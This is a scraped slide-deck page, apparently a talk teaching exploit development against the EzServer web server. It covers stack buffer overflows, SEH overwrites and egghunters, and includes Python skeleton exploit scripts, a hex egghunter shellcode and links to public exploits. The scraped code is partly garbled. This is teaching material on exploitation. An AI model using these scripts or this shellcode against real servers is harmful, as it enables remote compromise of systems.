Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 

Exploit Development: EzServer Buffer Overflow oleh Tom Gregory

  • 2. AGENDA  Memory  Stack/Buffer Overflow  Structured Exception Handler (SEH)  Escape from small space  Egghunter  Demo
  • 3. Args./Environment Stack Unused Memory Heap (dynamic data) Static Data .data Program Code .text PROCESS MEMORY LAYOUT High addresses Top of memory 0xFFFFFFFF Low addresses 0x00000000 Stack grows down by procedures call Heap grows up e.g. by malloc and new
  • 4. STACK BUFFER OVERFLOW #include <string.h> void foo (char *bar) { char c[12]; strcpy(c, bar); // no bounds checking... } int main (int argc, char **argv) { foo(argv[1]); }
  • 5. STACK BUFFER OVERFLOW Unallocated stack char c[12] char *bar Saved frame pointer (EBP) Return Address (EIP) Parent routine‟s stack Memory addressStack growth
  • 6. STACK BUFFER OVERFLOW Unallocated stack char c[12] char *bar Saved frame pointer (EBP) Return Address (EIP) Parent routine‟s stack Memory addressStack growth h e l l 0o
  • 7. STACK BUFFER OVERFLOW Unallocated stack Memory addressStack growth A A A A A A A A A A A A A A A A A A A A A A A A A A A A x08 x35 xc0 x80 Fill the stack with „A‟ Overwritten return address at 0x80c03508 Parent routine‟s stack Little Endian 0x80c03508
  • 8. WHAT IS SEH? This structure ( also called a SEH record) is 8 bytes and has 2 (4 bytes each) elements :  a pointer to the next exception_registration structure (in essence, to the next SEH record, in case the current handler is unable the handle the exception)  a pointer, the address of the actual code of the exception handler. (SE Handler)
  • 9. WHAT IS SEH? Image was taken without permission from http://images.google.com
  • 10. LOOK AT THE SEH STRUCTURE Beginning of SEH chain  SEH chain will be placed at the top of the main data block  It also called FS:[0] chain as well (on intel: mov [reg], dword ptr fs:[0]) End of seh chain  Is indicated by 0xFFFFFFFF  Will trigger improper termination to the program
  • 11. HOW SEH WORKS? Stack TEB FS[0]: 0012FF40 0012FF40 0012FF44 0012FFB0 : next SEH record 7C839AD8 : SE Handler 0012FFB0 0012FFB4 0012FFE0 : next SEH record 0040109A : SE Handler 0012FFE0 0012FFE4 FFFFFFFF : next SEH record 7C839AD8 : SE Handler
  • 12. PROTECTIONS AGAINST SEH XOR  before the exception handler is called, all registers are XORed with each other, so it will make them all point to 0x00000000 DEP & Stack Cookies  Stack Cookies or Canary is setup via C++ compiler options  DEP will mark the memory stack to no execute.  It was introduced since Windows XP SP2 and Windows 2003, enabled by default on Windows Vista and 7  Those two protections can make it harder to build exploits.
  • 13. PROTECTIONS AGAINST SEH SafeSEH  additional protection was added to compilers, helping to stop the abuse of SEH overwrites.  It will check the original value of SEH, if it overwritten, SafeSEH will try to bring it back to the original value.
  • 14. ABUSING SEH On direct RET technique:  Simply find an instruction to jump to the stack, done. While on SEH Based:  You cannot simply jump to the stack, because the registers are XORed.  We can take advantage this exception handling condition by overwrite the SE Handler address.  The OS will know the exception handling routine, and pass it to next SEH record.  Pointer to next SEH will bring us to the shellcode.  Game over!
  • 15. ABUSING SEH In other words, the payload must do the following things:  Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won‟t kick in.  Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)  Overwrite the SE handler with a pointer to an instruction that will bring you back to next SEH and execute the jumpcode.  The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten “pointer to next SEH record” will jump to it).
  • 16. ABUSING SEH  When the exception occurred, the position on the stack will going like this:  Possible value to overwrite SE Handler are POP something, POP something and RETN to the stack.  It will POP address that sit at the top of the stack, POP it again to take the second address, and RETN to execute the third address (which is now at the top of the stack) Top of stack Our pointer to next SEH address
  • 17. ABUSING SEH Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
  • 18. ESCAPE FROM SMALL SPACE  Use Egghunter  “Staged shellcode”  Use small amount of custom shellcode to find the actual “bigger” shellcode (the egg), by searching entire memory for the final shellcode
  • 19. EGGHUNTER  There are 3 conditions that are important in order for this technique to work  We must be able to jump to (jmp, call, push/ret) & execute “some” shellcode, the egghunter.  The final shellcode must be available somewhere in memory (stack/heap/…).  You must “tag” or prepend the final shellcode with a unique string/marker/tag. This means that we will have to define the marker in the egg hunter code, and also write it just in front of the actual shellcode.
  • 21. 1ST SKELETON EXPLOIT: CRASH IT! #!/usr/bin/python from socket import * junk = "x41" * 10000 s = socket(AF_INET, SOCK_STREAM) s.connect((„x.x.x.x‟,8000)) print "[+] Launching attack..” s.send ("GET /" + payload + "HTTP/1.0rnrnrn") s.close()
  • 22. 2ND SKELETON EXPLOIT: EIP OVERWRITE #!/usr/bin/python from socket import * junk = [random data generated from msf] s = socket(AF_INET, SOCK_STREAM) s.connect((„x.x.x.x‟,8000)) print "[+] Launching attack..” s.send ("GET /" + payload + "HTTP/1.0rnrnrn") s.close()
  • 23. 3RD SKELETON EXPLOIT: SMALL SPACE  Egghunter x66x81xcaxffx0fx42x52x6a x02x58xcdx2ex3cx05x5ax74 xefxb8x77x30x30x74x8bxfa xafx75xeaxafx75xe7xffxe7
  • 24. 4TH FINAL EXPLOIT  Exploit DB  http://www.exploit-db.com/exploits/19266/  Metasploit  http://www.exploit-db.com/exploits/19291/  http://www.metasploit.com/modules/exploit/windows/http/ezserver_http

Editor's Notes

  1. Stack is used for function callsThere are 2 Registers on the CPU associated with stack, EBP and ESP.ESP points to the top of the stack, whereas EBP points to the beginning of the current frameWhen a function is called, arguments, EIP and EBP pushed onto stackEBP is set to ESP, and ESP is decremented to make space for the functions local variable